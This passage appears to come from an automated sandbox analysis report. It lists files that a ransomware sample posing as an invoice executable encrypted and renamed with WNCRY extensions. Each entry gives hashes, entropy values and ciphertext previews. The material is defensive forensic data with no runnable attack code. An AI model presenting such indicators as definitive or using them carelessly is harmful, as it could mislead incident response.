                                                          SHA-512:B457B27F06367A80EB128A294F1D542F0911E0F29539E792BC6F0B68F9B0CA20DF4B664B16EA0D6D39A524F6E761A45011A65195F8241CC2EC90F48E7E8D5A59
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!....g~fT.......*.).Q...,F)......a....l.J..on...7}]GL...R..l1HPr.......zO....j......?.=.2.9.wM.....S...e.......m.?......[l...C.'.3. ...3..vZ...8x.....(.Cc...[.?#e...f{.......*.........$on\.@E.F.@Yb.&.nUU..>...]...e..........,.s1....C.=8e....?.qM.\j.............FN...=4_....Ka.>.^.....%......v..&U.....$..d...p*......l.........t.1`..=.....l....y1..Y7....E.j9...}m.:^.d..0.,..J.l...5..Ft.....9V..X...?..>.3^b.y..^*.!...:.Ye..R.4\.n._....k...P.1.z.5.Ir.H..g%.PLW.....J........5c[0....D..S....Q..G.8.?....e....|.:...}.H.>w..7....U.z)..7..DO..8..9\Am.A...g..w.G30O..Nh.*.....#....mc...I...{...<..0s1.]=e.....&.../..4..)U{10M2......(....;._^=...K............#..r....[...[#..8Q*y....ql...r...X........v..uvS.....C.NUw*..%$n.`.~.........x.A3iB.sz........f2.8..{+..m..rW.q8.J........'.\=.T.W:G.#.r$..}s..O!J....^4...k........$+&.w~ ..=.B......Q..,.......{......+..nv...l.....Zl.....$.n&UV-1&.1... .$K.....$.Cv....x2....;.j!d.75X.^..(.S........OUOM..w.w..P.6

                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000003.db.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):73800
                                                          Entropy (8bit):7.997518239907743
                                                          Encrypted:true
                                                          SSDEEP:1536:HApa2ot5nEtJGDvAbt+xWeRuU6DVl5cMoEfNFQzKmp91vMEOCsIbMUubbW:HADPJSDgeGbb7eprdOqbMPvW
                                                          MD5:DFE287FDCB95F661F5060247717EF6C2
                                                          SHA1:789E75D31A7F95B3A3FD936D78836402C6C32619
                                                          SHA-256:45B4CCF622AA8CE98EDE5FDA2C77B4F7EF2618225605F2B4D7A0F9666450BAD6
                                                          SHA-512:AC70BA6623E8D91DF297C693B4E142682BB86975E8EE9A11DEE5AA73DC025E92011D14998EB3FCB5C88DE59C9F8E8C6B502BD92B16BB28BAFF0490D35C7B422B
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....C.!A......I.......}t...o.....2.J..eJ.2.~..y..U....|"....L.q.Az...s...L@...9|U.-.q........u..o1e...B.7.../.d.$g^LcZr.w.PtN~...$..D.%.R.B...(..D..d...`.?}w.h%V:..uBa.z...+C9F....Z...W..#.........O.#...........k(..Yq.l..X.R.Nx.K.Jc....q.eI..rz....0.......{.:._e.m#RK.K.WVqZ..(|"DW|.T.7X......z.!.<.D..'"..y...Z..p..n%+7L......Fle..."q.Db}P......Ws.P..........Ow.pG.Y=.T.v......P.f.....1}.l..^c...{....d@x..~...E.h..']..F.{(yp"G...]+.....H.cw.../.yp...... .=.j2....r.?..M...,R.,B.........`....rQ|l.X).sJ.....s.W^D...c0dt.>2..3.C.w.YzR4.f.(.n9..z.e....n..)..?..........M."..!.-_.._.p.!.9q....z..7.9)..Dp.Z......k.q..].....pb.....P.^-....0yc.F3.7.Qd..jx.Mr.....w6.9.Wk............k...M...tI.....v.8m..j.b..M....y.9......v.r+oY!...}.@..M.{W......g.ed.#w..U...p.dN.........LBt.x6 P=.i.F....5Rd&P.LPU...$f.I.L...oG.,....$S!.[.z....>.q.......AF+..}Z.....&.Y....$....._..'....'..|..<.....s.... . .|....l...>r..i%H.p9....]....*..Y].)...0.#>......E

                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000003.db.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):73800
                                                          Entropy (8bit):7.997518239907743
                                                          Encrypted:true
                                                          SSDEEP:1536:HApa2ot5nEtJGDvAbt+xWeRuU6DVl5cMoEfNFQzKmp91vMEOCsIbMUubbW:HADPJSDgeGbb7eprdOqbMPvW
                                                          MD5:DFE287FDCB95F661F5060247717EF6C2
                                                          SHA1:789E75D31A7F95B3A3FD936D78836402C6C32619
                                                          SHA-256:45B4CCF622AA8CE98EDE5FDA2C77B4F7EF2618225605F2B4D7A0F9666450BAD6
                                                          SHA-512:AC70BA6623E8D91DF297C693B4E142682BB86975E8EE9A11DEE5AA73DC025E92011D14998EB3FCB5C88DE59C9F8E8C6B502BD92B16BB28BAFF0490D35C7B422B
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....C.!A......I.......}t...o.....2.J..eJ.2.~..y..U....|"....L.q.Az...s...L@...9|U.-.q........u..o1e...B.7.../.d.$g^LcZr.w.PtN~...$..D.%.R.B...(..D..d...`.?}w.h%V:..uBa.z...+C9F....Z...W..#.........O.#...........k(..Yq.l..X.R.Nx.K.Jc....q.eI..rz....0.......{.:._e.m#RK.K.WVqZ..(|"DW|.T.7X......z.!.<.D..'"..y...Z..p..n%+7L......Fle..."q.Db}P......Ws.P..........Ow.pG.Y=.T.v......P.f.....1}.l..^c...{....d@x..~...E.h..']..F.{(yp"G...]+.....H.cw.../.yp...... .=.j2....r.?..M...,R.,B.........`....rQ|l.X).sJ.....s.W^D...c0dt.>2..3.C.w.YzR4.f.(.n9..z.e....n..)..?..........M."..!.-_.._.p.!.9q....z..7.9)..Dp.Z......k.q..].....pb.....P.^-....0yc.F3.7.Qd..jx.Mr.....w6.9.Wk............k...M...tI.....v.8m..j.b..M....y.9......v.r+oY!...}.@..M.{W......g.ed.#w..U...p.dN.........LBt.x6 P=.i.F....5Rd&P.LPU...$f.I.L...oG.,....$S!.[.z....>.q.......AF+..}Z.....&.Y....$....._..'....'..|..<.....s.... . .|....l...>r..i%H.p9....]....*..Y].)...0.#>......E

                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000004.db.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):102344
                                                          Entropy (8bit):7.998614698093334
                                                          Encrypted:true
                                                          SSDEEP:3072:HfotBg1eslSmCWI1JZ193aRj9+wx+Z7jpK:HAtBg4sgT1Jp09b8K
                                                          MD5:907D9836438E4F1D3509878EAEDA2E03
                                                          SHA1:853ECBDF8FBCE24FF5D92342ED05A3E31CB9E56B
                                                          SHA-256:311E9CF51544EEE0A887722FDAA87252A17F0455944D7D56331E5487D7A2E165
                                                          SHA-512:6454EDF0877BFE1334C657F226196701484736D2969D6770B004A399EAF6BE188540FAA855AF823F075ECFEFA803AA49DE5C56AF55C87BE05116F52B69C30E24
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....f.=....l....%..v&..i)J.o.=.|H}...1$.>R'..]2..S....zG.s^....bO......k...E_..Hr....4,.. ...x...B/<...x..Uq....}.H....G.XM~.3...J0.yWR..tg.K....E....NCV.4.......\&v.;..o.B.9$....l..iO....D.AJb.Q....r......|]..{....B..E....3.....!.}9..uQ.F.k............9.-......c.\H2{..../.F...y...9sp...X....8uy..hJ.C.1.B..<......A.h~.g.Pf.L.c`..?....H....02.....v.;.kj.N.....pN1....\.+</.?......@..4..:.....n5.....\.$....v..<_..r..i{.o...(.j......P....X{..9.9...Q(......'h3..jg.U.|=.SDW.K.w:l..(.............Q.......:.3..]lEs....7S...S...5....3.1.r`.F.B.5......z#f0I.....`.8...C.NZ,c71\..c..]...(......%...P.d?.q#..ChF..R...&.H.(...<j......)qd.f...R.%nFk....f...,`SH.Te..j.....<.g....x'....r.$0...1..tm.$.om..G(}.n$..lW.#G.T../..*.75......"..F../...(.<{p.........9.i5&.T&.......$...6rO.Pz.In..P..*..b.z..oz....]6.....Y.H.X.....H&Za.=.Ss..s.@J..a2q.Pz..H..<.Oi....?..Vd'....(-G...W.i.+s..../.M...*[.M.].(....T.C.<....T.....h....>.....d...n.Nm.....

                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000004.db.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):102344
                                                          Entropy (8bit):7.998614698093334
                                                          Encrypted:true
                                                          SSDEEP:3072:HfotBg1eslSmCWI1JZ193aRj9+wx+Z7jpK:HAtBg4sgT1Jp09b8K
                                                          MD5:907D9836438E4F1D3509878EAEDA2E03
                                                          SHA1:853ECBDF8FBCE24FF5D92342ED05A3E31CB9E56B
                                                          SHA-256:311E9CF51544EEE0A887722FDAA87252A17F0455944D7D56331E5487D7A2E165
                                                          SHA-512:6454EDF0877BFE1334C657F226196701484736D2969D6770B004A399EAF6BE188540FAA855AF823F075ECFEFA803AA49DE5C56AF55C87BE05116F52B69C30E24
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....f.=....l....%..v&..i)J.o.=.|H}...1$.>R'..]2..S....zG.s^....bO......k...E_..Hr....4,.. ...x...B/<...x..Uq....}.H....G.XM~.3...J0.yWR..tg.K....E....NCV.4.......\&v.;..o.B.9$....l..iO....D.AJb.Q....r......|]..{....B..E....3.....!.}9..uQ.F.k............9.-......c.\H2{..../.F...y...9sp...X....8uy..hJ.C.1.B..<......A.h~.g.Pf.L.c`..?....H....02.....v.;.kj.N.....pN1....\.+</.?......@..4..:.....n5.....\.$....v..<_..r..i{.o...(.j......P....X{..9.9...Q(......'h3..jg.U.|=.SDW.K.w:l..(.............Q.......:.3..]lEs....7S...S...5....3.1.r`.F.B.5......z#f0I.....`.8...C.NZ,c71\..c..]...(......%...P.d?.q#..ChF..R...&.H.(...<j......)qd.f...R.%nFk....f...,`SH.Te..j.....<.g....x'....r.$0...1..tm.$.om..G(}.n$..lW.#G.T../..*.75......"..F../...(.<{p.........9.i5&.T&.......$...6rO.Pz.In..P..*..b.z..oz....]6.....Y.H.X.....H&Za.=.Ss..s.@J..a2q.Pz..H..<.Oi....?..Vd'....(-G...W.i.+s..../.M...*[.M.].(....T.C.<....T.....h....>.....d...n.Nm.....

                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_1280.db.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):312
                                                          Entropy (8bit):7.204960712313297
                                                          Encrypted:false
                                                          SSDEEP:6:bkEX5MVrD3ixqehbCOaNbMIrX9Aw06PTstrk156mwuUqsN5eyzC4+eDwCcWf:bkEX50rDSxqIb+b7An6PTR6buUZreL4N
                                                          MD5:8AB6C2CC1A13FAD74D77BB046FEC8D42
                                                          SHA1:4714FB7CBDDFB9B2A74477059A8E4051DD9C4310
                                                          SHA-256:7A1DBB9B9302DB8A37406E9A361AEABA84D576CD6647B37F6BC37F60C268703C
                                                          SHA-512:72981C9A621AA781501C4BC37F8290A6EF30505F9EE337AC75E214FFDD03902DB617D0E8D3BD058D92CD0A33E8C7E5E166C47EFB6FC598765F572C2C591CD24E
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....[..i..hv...=i....89...v.B.am...Zh.-..cl.->.y(.`..........u.3...GD.....>..Fp.E..8.gM....Fb,.+j....(|.#.=-.|+m.as.<ky.. .>r...}j.c.?............&.J7......z9%........n....a,%.v...f._SD7.7.eFe|h.*. .gf.v.....\...2...6.s...3....&ShJ6..(.....Y+.M!4.(\.M.>............{]..g.?..m..a..Q..i....f.}P..:

                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_1280.db.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):312
                                                          Entropy (8bit):7.204960712313297
                                                          Encrypted:false
                                                          SSDEEP:6:bkEX5MVrD3ixqehbCOaNbMIrX9Aw06PTstrk156mwuUqsN5eyzC4+eDwCcWf:bkEX50rDSxqIb+b7An6PTR6buUZreL4N
                                                          MD5:8AB6C2CC1A13FAD74D77BB046FEC8D42
                                                          SHA1:4714FB7CBDDFB9B2A74477059A8E4051DD9C4310
                                                          SHA-256:7A1DBB9B9302DB8A37406E9A361AEABA84D576CD6647B37F6BC37F60C268703C
                                                          SHA-512:72981C9A621AA781501C4BC37F8290A6EF30505F9EE337AC75E214FFDD03902DB617D0E8D3BD058D92CD0A33E8C7E5E166C47EFB6FC598765F572C2C591CD24E
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....[..i..hv...=i....89...v.B.am...Zh.-..cl.->.y(.`..........u.3...GD.....>..Fp.E..8.gM....Fb,.+j....(|.#.=-.|+m.as.<ky.. .>r...}j.c.?............&.J7......z9%........n....a,%.v...f._SD7.7.eFe|h.*. .gf.v.....\...2...6.s...3....&ShJ6..(.....Y+.M!4.(\.M.>............{]..g.?..m..a..Q..i....f.}P..:

                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_16.db.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1048856
                                                          Entropy (8bit):7.999807180634493
                                                          Encrypted:true
                                                          SSDEEP:24576:LQhdHX+VnTyjfTHrhdUeuy1MGCTVp1aDijX/IahA/nbbCs00:LgYVn6nPCTV3ay/PObv00
                                                          MD5:11E17ACDFA91449577F1A2D55FF5EA77
                                                          SHA1:2311CDF9C6BB24AC1273FCD6505581BEDF8688C1
                                                          SHA-256:5407A9073851677F721327115D60BADDD44FB3C1C678EB6EF1CEB9F8C31257F3
                                                          SHA-512:DFA08135CEA3D81003E9EAC726E709E92A8A15728B335D12CDBF382C31662EB90BA30D82FF08B4EA81FBBD301680BD50FA29A607A28417EE582B69B034E2840B
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....$P9D.m..{J]_W{..?.....7.V................o.]f...;6...Q.....[M...U,:..i...m.%'..6..... ya..&..]...UK.A.TI...f,.~.<..$.N9R....Z.q..._..-.v....7.|9...?..`S.........E......V..t..>..E.`J.r./ .e&.o..z.E.ra......z>'^......F........J....!.k<-.0d...5B............M.2B.s.[.Q..n..X?..........4a.j..JU...`.i.u......s..^!.`.'k]..(...L.lN...X...w9...Wy5......s...2..@.H`>(.....k;wj^..qn.G..p@..!N..r...8.t.-\u.].e...:.a.[...v.M.......W.0.n...'.......<......M..y.$..7.........zfb......&...$..j.......5......*wID-....?...F.Z....6...w.,.tw..r.#....'.D..u.{+..)...*7[.VY'a...J.....8.y......@..T.H.X.)(2..8(.B9...5.Hq....)..t5.9.'.z..C.jb@a,....I..x./.TNh..y.zK...,..U.-....D.N.5...6C..-;.L{.7c-.>.7./...?.M..w..(.|.A/.P._6)........[...]K..+T<..Y.3.c..F.+..."..I...B..|....c.+1.B.g:O....t..R)1..2KN.53I...4..T./Z5.] ^0.-,s.ez-.?z.^0Q_0.pD9._..,..v.,...}N...-.R.l.%Z.-3f..w.w..F+.6m2.r.rH...U...`>I~f..7.z.....;.#.B...l>.a.....>].V....9..U..YzK.|..f

                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_16.db.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1048856
                                                          Entropy (8bit):7.999807180634493
                                                          Encrypted:true
                                                          SSDEEP:24576:LQhdHX+VnTyjfTHrhdUeuy1MGCTVp1aDijX/IahA/nbbCs00:LgYVn6nPCTV3ay/PObv00
                                                          MD5:11E17ACDFA91449577F1A2D55FF5EA77
                                                          SHA1:2311CDF9C6BB24AC1273FCD6505581BEDF8688C1
                                                          SHA-256:5407A9073851677F721327115D60BADDD44FB3C1C678EB6EF1CEB9F8C31257F3
                                                          SHA-512:DFA08135CEA3D81003E9EAC726E709E92A8A15728B335D12CDBF382C31662EB90BA30D82FF08B4EA81FBBD301680BD50FA29A607A28417EE582B69B034E2840B
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....$P9D.m..{J]_W{..?.....7.V................o.]f...;6...Q.....[M...U,:..i...m.%'..6..... ya..&..]...UK.A.TI...f,.~.<..$.N9R....Z.q..._..-.v....7.|9...?..`S.........E......V..t..>..E.`J.r./ .e&.o..z.E.ra......z>'^......F........J....!.k<-.0d...5B............M.2B.s.[.Q..n..X?..........4a.j..JU...`.i.u......s..^!.`.'k]..(...L.lN...X...w9...Wy5......s...2..@.H`>(.....k;wj^..qn.G..p@..!N..r...8.t.-\u.].e...:.a.[...v.M.......W.0.n...'.......<......M..y.$..7.........zfb......&...$..j.......5......*wID-....?...F.Z....6...w.,.tw..r.#....'.D..u.{+..)...*7[.VY'a...J.....8.y......@..T.H.X.)(2..8(.B9...5.Hq....)..t5.9.'.z..C.jb@a,....I..x./.TNh..y.zK...,..U.-....D.N.5...6C..-;.L{.7c-.>.7./...?.M..w..(.|.A/.P._6)........[...]K..+T<..Y.3.c..F.+..."..I...B..|....c.+1.B.g:O....t..R)1..2KN.53I...4..T./Z5.] ^0.-,s.ez-.?z.^0Q_0.pD9._..,..v.,...}N...-.R.l.%Z.-3f..w.w..F+.6m2.r.rH...U...`>I~f..7.z.....;.#.B...l>.a.....>].V....9..U..YzK.|..f

                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_1920.db.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):312
                                                          Entropy (8bit):7.175072900503341
                                                          Encrypted:false
                                                          SSDEEP:6:bkEW0YN8o6Rh7Dv/lQI0c8hO5zU6GQC4ODt+sUFtiUd1UQculV:bkEW0+X63P/l0c8gCQC4O8dbTUQcqV
                                                          MD5:AF83FB2651D3015B5918FC9F50446C40
                                                          SHA1:056780F2A54A2304988886CC9985E8A2AAC1975C
                                                          SHA-256:6F7AAE6723730AA096D60F30D21C32F09C3A5A5F58F5C60A94AD8578A49A752B
                                                          SHA-512:29C116A03D3AEC762892AAC486AE1227473F365A5D0077AFF67D8EFA5506F46D32ABC102689723FD8C1AC33505758AC39E51DF1C45B455F7D211CCA7775E2170
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....*.m9.*|=..RI.u%...2...G...#)....$..e.!......P[..".%Cu@......'ZN..A.b.{e.5.g..K.}...bOt...|.Pe'q..>.Ps...z....6p.-..$..S......&n.#....;.q.x...TR..,..iz.!.^j=f.X']1./M.'...O..Lc....,..A..L..n.rz;|....t....~...R.bD.T.5v.eW...........:h.....u(..?..............)...#Y.b....YbK.......r#.0..?

                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_1920.db.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):312
                                                          Entropy (8bit):7.175072900503341
                                                          Encrypted:false
                                                          SSDEEP:6:bkEW0YN8o6Rh7Dv/lQI0c8hO5zU6GQC4ODt+sUFtiUd1UQculV:bkEW0+X63P/l0c8gCQC4O8dbTUQcqV
                                                          MD5:AF83FB2651D3015B5918FC9F50446C40
                                                          SHA1:056780F2A54A2304988886CC9985E8A2AAC1975C
                                                          SHA-256:6F7AAE6723730AA096D60F30D21C32F09C3A5A5F58F5C60A94AD8578A49A752B
                                                          SHA-512:29C116A03D3AEC762892AAC486AE1227473F365A5D0077AFF67D8EFA5506F46D32ABC102689723FD8C1AC33505758AC39E51DF1C45B455F7D211CCA7775E2170
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....*.m9.*|=..RI.u%...2...G...#)....$..e.!......P[..".%Cu@......'ZN..A.b.{e.5.g..K.}...bOt...|.Pe'q..>.Ps...z....6p.-..$..S......&n.#....;.q.x...TR..,..iz.!.^j=f.X']1./M.'...O..Lc....,..A..L..n.rz;|....t....~...R.bD.T.5v.eW...........:h.....u(..?..............)...#Y.b....YbK.......r#.0..?

                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_256.db.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):3146008
                                                          Entropy (8bit):7.999939773677453
                                                          Encrypted:true
                                                          SSDEEP:98304:Lvme4Tb4kbFadkqPmbQQPLvt/xUGtAye7rWwUSn:Lue4TLZarrcD/1ts7rWDSn
                                                          MD5:227C026DC1938D3352337FA2197E2AF5
                                                          SHA1:CF9FC2B9A45F221CD2E35EDFF27E201D1AAB5F94
                                                          SHA-256:A83B420EF0DC8C9C7EAEA6AA7B022F33708E4C416EBAA3267D51B851396A3CE7
                                                          SHA-512:EEAEBA9F77CFBDAA2E70EB1DFB5058B93D02E02A38381D24409575923822D73D70CA2B743B6686E3CAE29AA1450C84A4A8883CB3588977368C142E8C649569C3
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!....s4..'5kd.)...$zB.Q.... ..C6Y..T.....wQnd.yY..B...'..s6.\.O.-7..a..........$L.Q;...d1.E....;U?r.K9....w.M..C*B.(.O.0.?(.f.~.....].=..z.-..4....Mj..F....m^.C..v%...iQ.........s.... .\..nR..!.S.o..>.]&..+~..l.8R.....C..%:xu....'.w.2.7..W.5E..`.^.(...Z......0........wB.:`._....&.@UA;;%..+.....p.......H\n~h...)..D=&..{..L.......#...(.B.^..._...2..f.tQ...."o n.!.A....o...d8h....l..oR..~.X:..&.......'....H............m.GnU.z.T...6[.N.V.B..ar&......)Pe6.F..#.../;....l).K.1.......9...^*./.). l...D...`.zb.....p....z. ..X..or.....R<.......c..R+.8-].-.C....Q...L(.0.'....v8z.X.....r&].3...#.g..b.... ;b...!e..o+.E.....{...=.O"da.......h.b..I-......<]..N..........r..+Q....RUB.lA=..&../..A......'.N..d..d3.W.~..e..+...t..l......Z..hy1.&2....OY<...F...?.m..Y....&..~Z......la..#.4.....*:x.2.s..([.9..S..r.O]1k#.....X..k..N...eyA....~...g..R..' ..J+..m.d.R......I#..O.R...2jL..D...c .<(...f8..la-O&u.N...*.....L.......u.y..\Tf.Z.H........a.T<

                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_256.db.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):3146008
                                                          Entropy (8bit):7.999939773677453
                                                          Encrypted:true
                                                          SSDEEP:98304:Lvme4Tb4kbFadkqPmbQQPLvt/xUGtAye7rWwUSn:Lue4TLZarrcD/1ts7rWDSn
                                                          MD5:227C026DC1938D3352337FA2197E2AF5
                                                          SHA1:CF9FC2B9A45F221CD2E35EDFF27E201D1AAB5F94
                                                          SHA-256:A83B420EF0DC8C9C7EAEA6AA7B022F33708E4C416EBAA3267D51B851396A3CE7
                                                          SHA-512:EEAEBA9F77CFBDAA2E70EB1DFB5058B93D02E02A38381D24409575923822D73D70CA2B743B6686E3CAE29AA1450C84A4A8883CB3588977368C142E8C649569C3
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!....s4..'5kd.)...$zB.Q.... ..C6Y..T.....wQnd.yY..B...'..s6.\.O.-7..a..........$L.Q;...d1.E....;U?r.K9....w.M..C*B.(.O.0.?(.f.~.....].=..z.-..4....Mj..F....m^.C..v%...iQ.........s.... .\..nR..!.S.o..>.]&..+~..l.8R.....C..%:xu....'.w.2.7..W.5E..`.^.(...Z......0........wB.:`._....&.@UA;;%..+.....p.......H\n~h...)..D=&..{..L.......#...(.B.^..._...2..f.tQ...."o n.!.A....o...d8h....l..oR..~.X:..&.......'....H............m.GnU.z.T...6[.N.V.B..ar&......)Pe6.F..#.../;....l).K.1.......9...^*./.). l...D...`.zb.....p....z. ..X..or.....R<.......c..R+.8-].-.C....Q...L(.0.'....v8z.X.....r&].3...#.g..b.... ;b...!e..o+.E.....{...=.O"da.......h.b..I-......<]..N..........r..+Q....RUB.lA=..&../..A......'.N..d..d3.W.~..e..+...t..l......Z..hy1.&2....OY<...F...?.m..Y....&..~Z......la..#.4.....*:x.2.s..([.9..S..r.O]1k#.....X..k..N...eyA....~...g..R..' ..J+..m.d.R......I#..O.R...2jL..D...c .<(...f8..la-O&u.N...*.....L.......u.y..\Tf.Z.H........a.T<

                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_2560.db.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):312
                                                          Entropy (8bit):7.26980890989177
                                                          Encrypted:false
                                                          SSDEEP:6:bkEauVt3o1GGh8Z1bh9SottHyEkboLtir7h0w3ddL/THyyiUQxa1Cy6:bkEaucGGiXfXAr10odd7THyyixc1CX
                                                          MD5:303D03797428BDD4391E6038A3B31B2A
                                                          SHA1:4304A80289413B14A300B409FE20D7A65D67AF38
                                                          SHA-256:4E159307C5FDBA7AE2250EDC7518F07267400CB4202D844C69575E50E12A30CC
                                                          SHA-512:F72939341403D4FD2D0C00643741700C3CF8B65CE100C7FF83E7E065F6D5801E74FB353AE62516BCF7E92389F0A21EF5CE6F73EED7D5C5DC8B638011EF956737
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....P.k.l.c...1^Q...'m.u.V7H.m...#.)L.....@).u..{ <.x_.PN.6T....<.....^...k..DK}uA6..b.u.....X..j..a.N.k.:?I....$..Kl...G...h..JF...Q_N.....ixP.L..(VDx^...x..........h.fk.&..Oc..u..".!.&y..C.LX3.9Cn.,'.Ka.}.....I..c }..:....O..W..k....c....{5...gly............e.0.D.s.......~......o.......r.

                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_2560.db.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):312
                                                          Entropy (8bit):7.26980890989177
                                                          Encrypted:false
                                                          SSDEEP:6:bkEauVt3o1GGh8Z1bh9SottHyEkboLtir7h0w3ddL/THyyiUQxa1Cy6:bkEaucGGiXfXAr10odd7THyyixc1CX
                                                          MD5:303D03797428BDD4391E6038A3B31B2A
                                                          SHA1:4304A80289413B14A300B409FE20D7A65D67AF38
                                                          SHA-256:4E159307C5FDBA7AE2250EDC7518F07267400CB4202D844C69575E50E12A30CC
                                                          SHA-512:F72939341403D4FD2D0C00643741700C3CF8B65CE100C7FF83E7E065F6D5801E74FB353AE62516BCF7E92389F0A21EF5CE6F73EED7D5C5DC8B638011EF956737
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....P.k.l.c...1^Q...'m.u.V7H.m...#.)L.....@).u..{ <.x_.PN.6T....<.....^...k..DK}uA6..b.u.....X..j..a.N.k.:?I....$..Kl...G...h..JF...Q_N.....ixP.L..(VDx^...x..........h.fk.&..Oc..u..".!.&y..C.LX3.9Cn.,'.Ka.}.....I..c }..:....O..W..k....c....{5...gly............e.0.D.s.......~......o.......r.

                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_32.db.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):2097432
                                                          Entropy (8bit):7.999915491206557
                                                          Encrypted:true
                                                          SSDEEP:49152:eIEp/9o5rXdbb+u6CLeoPx4F56OrJ1qh2gJJap:eIEplo5BrB5iEOl1qIEcp
                                                          MD5:10E7546DAC27A4B72B332BDA6FA5B433
                                                          SHA1:939DDD8170AC1106FAD9E76C1CE51752E2E1BE38
                                                          SHA-256:81FE1D79B289FCC5334C71EDAAB1EF66AEB526832AED0C18327F31E9C7DF0B16
                                                          SHA-512:5987F3D765925AC4B75454D25D53FFD30638596C52DF81639D93EE6D0320D07D65C626928DCE6E358B288621BF1D74B00E597D5337115ACA15AF411A77397A68
                                                          Malicious:true
                                                          Reputation:unknown
